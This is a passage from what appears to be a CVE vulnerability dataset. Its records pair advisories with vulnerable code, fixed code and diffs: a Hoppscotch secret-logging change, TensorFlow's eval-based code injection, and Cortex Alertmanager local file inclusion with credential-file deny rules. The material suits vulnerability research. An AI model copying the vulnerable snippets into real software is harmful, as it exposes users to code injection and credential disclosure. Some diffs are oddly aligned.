settings');\n\n app.enableCors({\n origin: process.env.WHITELISTED_ORIGINS.split(','),\n credentials: true,\n });\n } else {\n console.log('Enabling CORS with production settings');\n\n app.enableCors({\n origin: process.env.WHITELISTED_ORIGINS.split(','),\n credentials: true,\n });\n }\n app.enableVersioning({\n type: VersioningType.URI,\n });\n app.use(cookieParser());\n await app.listen(process.env.PORT || 3170);\n}\n\nif (!process.env.GENERATE_GQL_SCHEMA) {\n bootstrap();\n} else {\n emitGQLSchemaFile();\n}"}], "vul_patch": "--- a/packages/hoppscotch-backend/src/main.ts\n+++ b/packages/hoppscotch-backend/src/main.ts\n@@ -1,7 +1,6 @@\n async function bootstrap() {\n console.log(`Running in production: ${process.env.PRODUCTION}`);\n console.log(`Port: ${process.env.PORT}`);\n- 
console.log(`Database: ${process.env.DATABASE_URL}`);\n \n const app = await NestFactory.create(AppModule);\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-41228", "cve_description": "TensorFlow is an open source platform for machine learning. In affected versions TensorFlow's `saved_model_cli` tool is vulnerable to a code injection as it calls `eval` on user supplied strings. This can be used by attackers to run arbitrary code on the platform where the CLI tool runs. However, given that the tool is always run manually, the impact of this is not severe. We have patched this by adding a `safe` flag which defaults to `True` and an explicit warning for users. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/tensorflow/tensorflow", "patch_url": ["https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7"], "programing_language": "Python", "vul_func": [{"id": "vul_py_174_1", "commit": "349172c", "file_path": "tensorflow/python/tools/saved_model_cli.py", "start_line": 524, "end_line": 550, "snippet": "def preprocess_input_exprs_arg_string(input_exprs_str):\n \"\"\"Parses input arg into dictionary that maps input key to python expression.\n\n Parses input string in the format of 'input_key=' into a\n dictionary that maps each input_key to its python expression.\n\n Args:\n input_exprs_str: A string that specifies python expression for input keys.\n Each input is separated by semicolon. For each input key:\n 'input_key='\n\n Returns:\n A dictionary that maps input keys to their values.\n\n Raises:\n RuntimeError: An error when the given input string is in a bad format.\n \"\"\"\n input_dict = {}\n\n for input_raw in filter(bool, input_exprs_str.split(';')):\n if '=' not in input_exprs_str:\n raise RuntimeError('--input_exprs \"%s\" format is incorrect. 
Please follow'\n '\"=\"' % input_exprs_str)\n input_key, expr = input_raw.split('=', 1)\n # ast.literal_eval does not work with numpy expressions\n input_dict[input_key] = eval(expr) # pylint: disable=eval-used\n return input_dict"}, {"id": "vul_py_174_2", "commit": "349172c", "file_path": "tensorflow/python/tools/saved_model_cli.py", "start_line": 611, "end_line": 711, "snippet": "def load_inputs_from_input_arg_string(inputs_str, input_exprs_str,\n input_examples_str):\n \"\"\"Parses input arg strings and create inputs feed_dict.\n\n Parses '--inputs' string for inputs to be loaded from file, and parses\n '--input_exprs' string for inputs to be evaluated from python expression.\n '--input_examples' string for inputs to be created from tf.example feature\n dictionary list.\n\n Args:\n inputs_str: A string that specified where to load inputs. Each input is\n separated by semicolon.\n * For each input key:\n '=' or\n '=[]'\n * The optional 'variable_name' key will be set to None if not specified.\n * File specified by 'filename' will be loaded using numpy.load. Inputs\n can be loaded from only .npy, .npz or pickle files.\n * The \"[variable_name]\" key is optional depending on the input file type\n as descripted in more details below.\n When loading from a npy file, which always contains a numpy ndarray, the\n content will be directly assigned to the specified input tensor. If a\n variable_name is specified, it will be ignored and a warning will be\n issued.\n When loading from a npz zip file, user can specify which variable within\n the zip file to load for the input tensor inside the square brackets. If\n nothing is specified, this function will check that only one file is\n included in the zip and load it for the specified input tensor.\n When loading from a pickle file, if no variable_name is specified in the\n square brackets, whatever that is inside the pickle file will be passed\n to the specified input tensor, else SavedModel CLI will assume a\n dictionary is stored in the pickle file and the value corresponding to\n the variable_name will be used.\n input_exprs_str: A string that specifies python expressions for inputs.\n * In the format of: '='.\n * numpy module is available as np.\n input_examples_str: A string that specifies tf.Example with dictionary.\n * In the format of: '=<[{feature:value list}]>'\n\n Returns:\n A dictionary that maps input tensor keys to numpy ndarrays.\n\n Raises:\n RuntimeError: An error when a key is specified, but the input file contains\n multiple numpy ndarrays, none of which matches the given key.\n RuntimeError: An error when no key is specified, but the input file contains\n more than one numpy ndarrays.\n \"\"\"\n tensor_key_feed_dict = {}\n\n inputs = preprocess_inputs_arg_string(inputs_str)\n input_exprs = preprocess_input_exprs_arg_string(input_exprs_str)\n input_examples = preprocess_input_examples_arg_string(input_examples_str)\n\n for input_tensor_key, (filename, variable_name) in inputs.items():\n data = np.load(file_io.FileIO(filename, mode='rb'), allow_pickle=True) # pylint: disable=unexpected-keyword-arg\n\n # When a variable_name key is specified for the input file\n if variable_name:\n # if file contains a single ndarray, ignore the input name\n if isinstance(data, np.ndarray):\n logging.warn(\n 'Input file %s contains a single ndarray. 
Name key \\\"%s\\\" ignored.'\n % (filename, variable_name))\n tensor_key_feed_dict[input_tensor_key] = data\n else:\n if variable_name in data:\n tensor_key_feed_dict[input_tensor_key] = data[variable_name]\n else:\n raise RuntimeError(\n 'Input file %s does not contain variable with name \\\"%s\\\".' %\n (filename, variable_name))\n # When no key is specified for the input file.\n else:\n # Check if npz file only contains a single numpy ndarray.\n if isinstance(data, np.lib.npyio.NpzFile):\n variable_name_list = data.files\n if len(variable_name_list) != 1:\n raise RuntimeError(\n 'Input file %s contains more than one ndarrays. Please specify '\n 'the name of ndarray to use.' % filename)\n tensor_key_feed_dict[input_tensor_key] = data[variable_name_list[0]]\n else:\n tensor_key_feed_dict[input_tensor_key] = data\n\n # When input is a python expression:\n for input_tensor_key, py_expr_evaluated in input_exprs.items():\n if input_tensor_key in tensor_key_feed_dict:\n logging.warn(\n 'input_key %s has been specified with both --inputs and --input_exprs'\n ' options. Value in --input_exprs will be used.' % input_tensor_key)\n tensor_key_feed_dict[input_tensor_key] = py_expr_evaluated\n\n # When input is a tf.Example:\n for input_tensor_key, example in input_examples.items():\n if input_tensor_key in tensor_key_feed_dict:\n logging.warn(\n 'input_key %s has been specified in multiple options. Value in '\n '--input_examples will be used.' % input_tensor_key)\n tensor_key_feed_dict[input_tensor_key] = example\n return tensor_key_feed_dict"}], "fix_func": [{"id": "fix_py_174_1", "commit": "8b202f0", "file_path": "tensorflow/python/tools/saved_model_cli.py", "start_line": 525, "end_line": 560, "snippet": "def preprocess_input_exprs_arg_string(input_exprs_str, safe=True):\n \"\"\"Parses input arg into dictionary that maps input key to python expression.\n\n Parses input string in the format of 'input_key=' into a\n dictionary that maps each input_key to its python expression.\n\n Args:\n input_exprs_str: A string that specifies python expression for input keys.\n Each input is separated by semicolon. For each input key:\n 'input_key='\n safe: Whether to evaluate the python expression as literals or allow\n arbitrary calls (e.g. numpy usage).\n\n Returns:\n A dictionary that maps input keys to their values.\n\n Raises:\n RuntimeError: An error when the given input string is in a bad format.\n \"\"\"\n input_dict = {}\n\n for input_raw in filter(bool, input_exprs_str.split(';')):\n if '=' not in input_exprs_str:\n raise RuntimeError('--input_exprs \"%s\" format is incorrect. 
Please follow'\n '\"=\"' % input_exprs_str)\n input_key, expr = input_raw.split('=', 1)\n if safe:\n try:\n input_dict[input_key] = ast.literal_eval(expr)\n except:\n raise RuntimeError(\n f'Expression \"{expr}\" is not a valid python literal.')\n else:\n # ast.literal_eval does not work with numpy expressions\n input_dict[input_key] = eval(expr) # pylint: disable=eval-used\n return input_dict"}, {"id": "fix_py_174_2", "commit": "8b202f0", "file_path": "tensorflow/python/tools/saved_model_cli.py", "start_line": 621, "end_line": 721, "snippet": "def load_inputs_from_input_arg_string(inputs_str, input_exprs_str,\n input_examples_str):\n \"\"\"Parses input arg strings and create inputs feed_dict.\n\n Parses '--inputs' string for inputs to be loaded from file, and parses\n '--input_exprs' string for inputs to be evaluated from python expression.\n '--input_examples' string for inputs to be created from tf.example feature\n dictionary list.\n\n Args:\n inputs_str: A string that specified where to load inputs. Each input is\n separated by semicolon.\n * For each input key:\n '=' or\n '=[]'\n * The optional 'variable_name' key will be set to None if not specified.\n * File specified by 'filename' will be loaded using numpy.load. Inputs\n can be loaded from only .npy, .npz or pickle files.\n * The \"[variable_name]\" key is optional depending on the input file type\n as descripted in more details below.\n When loading from a npy file, which always contains a numpy ndarray, the\n content will be directly assigned to the specified input tensor. If a\n variable_name is specified, it will be ignored and a warning will be\n issued.\n When loading from a npz zip file, user can specify which variable within\n the zip file to load for the input tensor inside the square brackets. If\n nothing is specified, this function will check that only one file is\n included in the zip and load it for the specified input tensor.\n When loading from a pickle file, if no variable_name is specified in the\n square brackets, whatever that is inside the pickle file will be passed\n to the specified input tensor, else SavedModel CLI will assume a\n dictionary is stored in the pickle file and the value corresponding to\n the variable_name will be used.\n input_exprs_str: A string that specifies python expressions for inputs.\n * In the format of: '='.\n * numpy module is available as np.\n input_examples_str: A string that specifies tf.Example with dictionary.\n * In the format of: '=<[{feature:value list}]>'\n\n Returns:\n A dictionary that maps input tensor keys to numpy ndarrays.\n\n Raises:\n RuntimeError: An error when a key is specified, but the input file contains\n multiple numpy ndarrays, none of which matches the given key.\n RuntimeError: An error when no key is specified, but the input file contains\n more than one numpy ndarrays.\n \"\"\"\n tensor_key_feed_dict = {}\n\n inputs = preprocess_inputs_arg_string(inputs_str)\n input_exprs = preprocess_input_exprs_arg_string(input_exprs_str, safe=False)\n input_examples = preprocess_input_examples_arg_string(input_examples_str)\n\n for input_tensor_key, (filename, variable_name) in inputs.items():\n data = np.load(file_io.FileIO(filename, mode='rb'), allow_pickle=True) # pylint: disable=unexpected-keyword-arg\n\n # When a variable_name key is specified for the input file\n if variable_name:\n # if file contains a single ndarray, ignore the input name\n if isinstance(data, np.ndarray):\n logging.warn(\n 'Input file %s contains a single ndarray. 
Name key \\\"%s\\\" ignored.'\n % (filename, variable_name))\n tensor_key_feed_dict[input_tensor_key] = data\n else:\n if variable_name in data:\n tensor_key_feed_dict[input_tensor_key] = data[variable_name]\n else:\n raise RuntimeError(\n 'Input file %s does not contain variable with name \\\"%s\\\".' %\n (filename, variable_name))\n # When no key is specified for the input file.\n else:\n # Check if npz file only contains a single numpy ndarray.\n if isinstance(data, np.lib.npyio.NpzFile):\n variable_name_list = data.files\n if len(variable_name_list) != 1:\n raise RuntimeError(\n 'Input file %s contains more than one ndarrays. Please specify '\n 'the name of ndarray to use.' % filename)\n tensor_key_feed_dict[input_tensor_key] = data[variable_name_list[0]]\n else:\n tensor_key_feed_dict[input_tensor_key] = data\n\n # When input is a python expression:\n for input_tensor_key, py_expr_evaluated in input_exprs.items():\n if input_tensor_key in tensor_key_feed_dict:\n logging.warn(\n 'input_key %s has been specified with both --inputs and --input_exprs'\n ' options. Value in --input_exprs will be used.' % input_tensor_key)\n tensor_key_feed_dict[input_tensor_key] = py_expr_evaluated\n\n # When input is a tf.Example:\n for input_tensor_key, example in input_examples.items():\n if input_tensor_key in tensor_key_feed_dict:\n logging.warn(\n 'input_key %s has been specified in multiple options. Value in '\n '--input_examples will be used.' % input_tensor_key)\n tensor_key_feed_dict[input_tensor_key] = example\n return tensor_key_feed_dict"}], "vul_patch": "--- a/tensorflow/python/tools/saved_model_cli.py\n+++ b/tensorflow/python/tools/saved_model_cli.py\n@@ -1,4 +1,4 @@\n-def preprocess_input_exprs_arg_string(input_exprs_str):\n+def preprocess_input_exprs_arg_string(input_exprs_str, safe=True):\n \"\"\"Parses input arg into dictionary that maps input key to python expression.\n \n Parses input string in the format of 'input_key=' into a\n@@ -6,8 +6,10 @@\n \n Args:\n input_exprs_str: A string that specifies python expression for input keys.\n- Each input is separated by semicolon. For each input key:\n+ Each input is separated by semicolon. For each input key:\n 'input_key='\n+ safe: Whether to evaluate the python expression as literals or allow\n+ arbitrary calls (e.g. numpy usage).\n \n Returns:\n A dictionary that maps input keys to their values.\n@@ -22,6 +24,13 @@\n raise RuntimeError('--input_exprs \"%s\" format is incorrect. 
Please follow'\n '\"=\"' % input_exprs_str)\n input_key, expr = input_raw.split('=', 1)\n- # ast.literal_eval does not work with numpy expressions\n- input_dict[input_key] = eval(expr) # pylint: disable=eval-used\n+ if safe:\n+ try:\n+ input_dict[input_key] = ast.literal_eval(expr)\n+ except:\n+ raise RuntimeError(\n+ f'Expression \"{expr}\" is not a valid python literal.')\n+ else:\n+ # ast.literal_eval does not work with numpy expressions\n+ input_dict[input_key] = eval(expr) # pylint: disable=eval-used\n return input_dict\n\n--- a/tensorflow/python/tools/saved_model_cli.py\n+++ b/tensorflow/python/tools/saved_model_cli.py\n@@ -49,7 +49,7 @@\n tensor_key_feed_dict = {}\n \n inputs = preprocess_inputs_arg_string(inputs_str)\n- input_exprs = preprocess_input_exprs_arg_string(input_exprs_str)\n+ input_exprs = preprocess_input_exprs_arg_string(input_exprs_str, safe=False)\n input_examples = preprocess_input_examples_arg_string(input_examples_str)\n \n for input_tensor_key, (filename, variable_name) in inputs.items():\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-23536", "cve_description": "Cortex provides multi-tenant, long term storage for Prometheus. A local file inclusion vulnerability exists in Cortex versions 1.13.0, 1.13.1 and 1.14.0, where a malicious actor could remotely read local files as a result of parsing maliciously crafted Alertmanager configurations when submitted to the Alertmanager Set Configuration API. Only users of the Alertmanager service where `-experimental.alertmanager.enable-api` or `enable_api: true` is configured are affected. Affected Cortex users are advised to upgrade to patched versions 1.13.2 or 1.14.1. However as a workaround, Cortex administrators may reject Alertmanager configurations containing the `api_key_file` setting in the `opsgenie_configs` section before sending to the Set Alertmanager Configuration API.\n", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/cortexproject/cortex", "patch_url": ["https://github.com/cortexproject/cortex/commit/03e023d8b012887b31cc268d0d011b01e1e65506"], "programing_language": "Go", "vul_func": [{"id": "vul_go_34_1", "commit": "e6a3da9", "file_path": "pkg/alertmanager/api.go", "start_line": 310, "end_line": 397, "snippet": "func validateAlertmanagerConfig(cfg interface{}) error {\n\tv := reflect.ValueOf(cfg)\n\tt := v.Type()\n\n\t// Skip invalid, the zero value or a nil pointer (checked by zero value).\n\tif !v.IsValid() || v.IsZero() {\n\t\treturn nil\n\t}\n\n\t// If the input config is a pointer then we need to get its value.\n\t// At this point the pointer value can't be nil.\n\tif v.Kind() == reflect.Ptr {\n\t\tv = v.Elem()\n\t\tt = v.Type()\n\t}\n\n\t// Check if the input config is a data type for which we have a specific validation.\n\t// At this point the value can't be a pointer anymore.\n\tswitch t {\n\tcase 
reflect.TypeOf(config.GlobalConfig{}):\n\t\tif err := validateGlobalConfig(v.Interface().(config.GlobalConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\n\tcase reflect.TypeOf(commoncfg.HTTPClientConfig{}):\n\t\tif err := validateReceiverHTTPConfig(v.Interface().(commoncfg.HTTPClientConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\n\tcase reflect.TypeOf(commoncfg.TLSConfig{}):\n\t\tif err := validateReceiverTLSConfig(v.Interface().(commoncfg.TLSConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\n\tcase reflect.TypeOf(config.SlackConfig{}):\n\t\tif err := validateSlackConfig(v.Interface().(config.SlackConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\n\tcase reflect.TypeOf(config.VictorOpsConfig{}):\n\t\tif err := validateVictorOpsConfig(v.Interface().(config.VictorOpsConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\t// If the input config is a struct, recursively iterate on all fields.\n\tif t.Kind() == reflect.Struct {\n\t\tfor i := 0; i < t.NumField(); i++ {\n\t\t\tfield := t.Field(i)\n\t\t\tfieldValue := v.FieldByIndex(field.Index)\n\n\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n\t\t\tif fieldValue.CanInterface() {\n\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tif t.Kind() == reflect.Slice || t.Kind() == reflect.Array {\n\t\tfor i := 0; i < v.Len(); i++ {\n\t\t\tfieldValue := v.Index(i)\n\n\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n\t\t\tif fieldValue.CanInterface() {\n\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tif t.Kind() == reflect.Map {\n\t\tfor _, key := range v.MapKeys() {\n\t\t\tfieldValue := v.MapIndex(key)\n\n\t\t\t// Skip any field value which can't be converted to interface (eg. 
primitive types).\n\t\t\tif fieldValue.CanInterface() {\n\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}"}, {"id": "vul_go_34_2", "commit": "e6a3da9", "file_path": "pkg/alertmanager/api.go", "start_line": 428, "end_line": 433, "snippet": "func validateGlobalConfig(cfg config.GlobalConfig) error {\n\tif cfg.SlackAPIURLFile != \"\" {\n\t\treturn errSlackAPIURLFileNotAllowed\n\t}\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_34_1", "commit": "03e023d", "file_path": "pkg/alertmanager/api.go", "start_line": 42, "end_line": 49, "snippet": "var (\n\terrPasswordFileNotAllowed = errors.New(\"setting password_file, bearer_token_file and credentials_file is not allowed\")\n\terrOAuth2SecretFileNotAllowed = errors.New(\"setting OAuth2 client_secret_file is not allowed\")\n\terrTLSFileNotAllowed = errors.New(\"setting TLS ca_file, cert_file and key_file is not allowed\")\n\terrSlackAPIURLFileNotAllowed = errors.New(\"setting Slack api_url_file and global slack_api_url_file is not allowed\")\n\terrVictorOpsAPIKeyFileNotAllowed = errors.New(\"setting VictorOps api_key_file is not allowed\")\n\terrOpsGenieAPIKeyFileNotAllowed = errors.New(\"setting OpsGenie api_key_file is not allowed\")\n)"}, {"id": "fix_go_34_2", "commit": "03e023d", "file_path": "pkg/alertmanager/api.go", "start_line": 311, "end_line": 403, "snippet": "func validateAlertmanagerConfig(cfg interface{}) error {\n\tv := reflect.ValueOf(cfg)\n\tt := v.Type()\n\n\t// Skip invalid, the zero value or a nil pointer (checked by zero value).\n\tif !v.IsValid() || v.IsZero() {\n\t\treturn nil\n\t}\n\n\t// If the input config is a pointer then we need to get its value.\n\t// At this point the pointer value can't be nil.\n\tif v.Kind() == reflect.Ptr {\n\t\tv = v.Elem()\n\t\tt = v.Type()\n\t}\n\n\t// Check if the input config is a data type for which we have a specific validation.\n\t// At this point the value can't be a pointer anymore.\n\tswitch t {\n\tcase reflect.TypeOf(config.GlobalConfig{}):\n\t\tif err := validateGlobalConfig(v.Interface().(config.GlobalConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\n\tcase reflect.TypeOf(commoncfg.HTTPClientConfig{}):\n\t\tif err := validateReceiverHTTPConfig(v.Interface().(commoncfg.HTTPClientConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\n\tcase reflect.TypeOf(config.OpsGenieConfig{}):\n\t\tif err := validateOpsGenieConfig(v.Interface().(config.OpsGenieConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\n\tcase reflect.TypeOf(commoncfg.TLSConfig{}):\n\t\tif err := validateReceiverTLSConfig(v.Interface().(commoncfg.TLSConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\n\tcase reflect.TypeOf(config.SlackConfig{}):\n\t\tif err := validateSlackConfig(v.Interface().(config.SlackConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\n\tcase reflect.TypeOf(config.VictorOpsConfig{}):\n\t\tif err := validateVictorOpsConfig(v.Interface().(config.VictorOpsConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\t// If the input config is a struct, recursively iterate on all fields.\n\tif t.Kind() == reflect.Struct {\n\t\tfor i := 0; i < t.NumField(); i++ {\n\t\t\tfield := t.Field(i)\n\t\t\tfieldValue := v.FieldByIndex(field.Index)\n\n\t\t\t// Skip any field value which can't be converted to interface (eg. 
primitive types).\n\t\t\tif fieldValue.CanInterface() {\n\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tif t.Kind() == reflect.Slice || t.Kind() == reflect.Array {\n\t\tfor i := 0; i < v.Len(); i++ {\n\t\t\tfieldValue := v.Index(i)\n\n\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n\t\t\tif fieldValue.CanInterface() {\n\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tif t.Kind() == reflect.Map {\n\t\tfor _, key := range v.MapKeys() {\n\t\t\tfieldValue := v.MapIndex(key)\n\n\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n\t\t\tif fieldValue.CanInterface() {\n\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}"}, {"id": "fix_go_34_3", "commit": "03e023d", "file_path": "pkg/alertmanager/api.go", "start_line": 434, "end_line": 442, "snippet": "func validateGlobalConfig(cfg config.GlobalConfig) error {\n\tif cfg.OpsGenieAPIKeyFile != \"\" {\n\t\treturn errOpsGenieAPIKeyFileNotAllowed\n\t}\n\tif cfg.SlackAPIURLFile != \"\" {\n\t\treturn errSlackAPIURLFileNotAllowed\n\t}\n\treturn nil\n}"}, {"id": "fix_go_34_4", "commit": "03e023d", "file_path": "pkg/alertmanager/api.go", "start_line": 446, "end_line": 451, "snippet": "func validateOpsGenieConfig(cfg config.OpsGenieConfig) error {\n\tif cfg.APIKeyFile != \"\" {\n\t\treturn errOpsGenieAPIKeyFileNotAllowed\n\t}\n\treturn nil\n}"}], "vul_patch": "--- a/pkg/alertmanager/api.go\n+++ b/pkg/alertmanager/api.go\n@@ -1,88 +1,8 @@\n-func validateAlertmanagerConfig(cfg interface{}) error {\n-\tv := reflect.ValueOf(cfg)\n-\tt := v.Type()\n-\n-\t// Skip invalid, the zero value or a nil pointer (checked by zero value).\n-\tif !v.IsValid() || v.IsZero() {\n-\t\treturn nil\n-\t}\n-\n-\t// If the input config is a pointer then we need to get its value.\n-\t// At this point the pointer value can't be nil.\n-\tif v.Kind() == reflect.Ptr {\n-\t\tv = v.Elem()\n-\t\tt = v.Type()\n-\t}\n-\n-\t// Check if the input config is a data type for which we have a specific validation.\n-\t// At this point the value can't be a pointer anymore.\n-\tswitch t {\n-\tcase reflect.TypeOf(config.GlobalConfig{}):\n-\t\tif err := validateGlobalConfig(v.Interface().(config.GlobalConfig)); err != nil {\n-\t\t\treturn err\n-\t\t}\n-\n-\tcase reflect.TypeOf(commoncfg.HTTPClientConfig{}):\n-\t\tif err := validateReceiverHTTPConfig(v.Interface().(commoncfg.HTTPClientConfig)); err != nil {\n-\t\t\treturn err\n-\t\t}\n-\n-\tcase reflect.TypeOf(commoncfg.TLSConfig{}):\n-\t\tif err := validateReceiverTLSConfig(v.Interface().(commoncfg.TLSConfig)); err != nil {\n-\t\t\treturn err\n-\t\t}\n-\n-\tcase reflect.TypeOf(config.SlackConfig{}):\n-\t\tif err := validateSlackConfig(v.Interface().(config.SlackConfig)); err != nil {\n-\t\t\treturn err\n-\t\t}\n-\n-\tcase reflect.TypeOf(config.VictorOpsConfig{}):\n-\t\tif err := validateVictorOpsConfig(v.Interface().(config.VictorOpsConfig)); err != nil {\n-\t\t\treturn err\n-\t\t}\n-\t}\n-\n-\t// If the input config is a struct, recursively iterate on all fields.\n-\tif t.Kind() == reflect.Struct {\n-\t\tfor i := 0; i < t.NumField(); i++ {\n-\t\t\tfield := t.Field(i)\n-\t\t\tfieldValue := v.FieldByIndex(field.Index)\n-\n-\t\t\t// Skip any field value which can't be converted to interface 
(eg. primitive types).\n-\t\t\tif fieldValue.CanInterface() {\n-\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n-\t\t\t\t\treturn err\n-\t\t\t\t}\n-\t\t\t}\n-\t\t}\n-\t}\n-\n-\tif t.Kind() == reflect.Slice || t.Kind() == reflect.Array {\n-\t\tfor i := 0; i < v.Len(); i++ {\n-\t\t\tfieldValue := v.Index(i)\n-\n-\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n-\t\t\tif fieldValue.CanInterface() {\n-\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n-\t\t\t\t\treturn err\n-\t\t\t\t}\n-\t\t\t}\n-\t\t}\n-\t}\n-\n-\tif t.Kind() == reflect.Map {\n-\t\tfor _, key := range v.MapKeys() {\n-\t\t\tfieldValue := v.MapIndex(key)\n-\n-\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n-\t\t\tif fieldValue.CanInterface() {\n-\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n-\t\t\t\t\treturn err\n-\t\t\t\t}\n-\t\t\t}\n-\t\t}\n-\t}\n-\n-\treturn nil\n-}\n+var (\n+\terrPasswordFileNotAllowed = errors.New(\"setting password_file, bearer_token_file and credentials_file is not allowed\")\n+\terrOAuth2SecretFileNotAllowed = errors.New(\"setting OAuth2 client_secret_file is not allowed\")\n+\terrTLSFileNotAllowed = errors.New(\"setting TLS ca_file, cert_file and key_file is not allowed\")\n+\terrSlackAPIURLFileNotAllowed = errors.New(\"setting Slack api_url_file and global slack_api_url_file is not allowed\")\n+\terrVictorOpsAPIKeyFileNotAllowed = errors.New(\"setting VictorOps api_key_file is not allowed\")\n+\terrOpsGenieAPIKeyFileNotAllowed = errors.New(\"setting OpsGenie api_key_file is not allowed\")\n+)\n\n--- a/pkg/alertmanager/api.go\n+++ b/pkg/alertmanager/api.go\n@@ -1,6 +1,93 @@\n-func validateGlobalConfig(cfg config.GlobalConfig) error {\n-\tif cfg.SlackAPIURLFile != \"\" {\n-\t\treturn errSlackAPIURLFileNotAllowed\n+func validateAlertmanagerConfig(cfg interface{}) error {\n+\tv := reflect.ValueOf(cfg)\n+\tt := v.Type()\n+\n+\t// Skip invalid, the zero value or a nil pointer (checked by zero value).\n+\tif !v.IsValid() || v.IsZero() {\n+\t\treturn nil\n \t}\n+\n+\t// If the input config is a pointer then we need to get its value.\n+\t// At this point the pointer value can't be nil.\n+\tif v.Kind() == reflect.Ptr {\n+\t\tv = v.Elem()\n+\t\tt = v.Type()\n+\t}\n+\n+\t// Check if the input config is a data type for which we have a specific validation.\n+\t// At this point the value can't be a pointer anymore.\n+\tswitch t {\n+\tcase reflect.TypeOf(config.GlobalConfig{}):\n+\t\tif err := validateGlobalConfig(v.Interface().(config.GlobalConfig)); err != nil {\n+\t\t\treturn err\n+\t\t}\n+\n+\tcase reflect.TypeOf(commoncfg.HTTPClientConfig{}):\n+\t\tif err := validateReceiverHTTPConfig(v.Interface().(commoncfg.HTTPClientConfig)); err != nil {\n+\t\t\treturn err\n+\t\t}\n+\n+\tcase reflect.TypeOf(config.OpsGenieConfig{}):\n+\t\tif err := validateOpsGenieConfig(v.Interface().(config.OpsGenieConfig)); err != nil {\n+\t\t\treturn err\n+\t\t}\n+\n+\tcase reflect.TypeOf(commoncfg.TLSConfig{}):\n+\t\tif err := validateReceiverTLSConfig(v.Interface().(commoncfg.TLSConfig)); err != nil {\n+\t\t\treturn err\n+\t\t}\n+\n+\tcase reflect.TypeOf(config.SlackConfig{}):\n+\t\tif err := validateSlackConfig(v.Interface().(config.SlackConfig)); err != nil {\n+\t\t\treturn err\n+\t\t}\n+\n+\tcase reflect.TypeOf(config.VictorOpsConfig{}):\n+\t\tif err := validateVictorOpsConfig(v.Interface().(config.VictorOpsConfig)); err != nil 
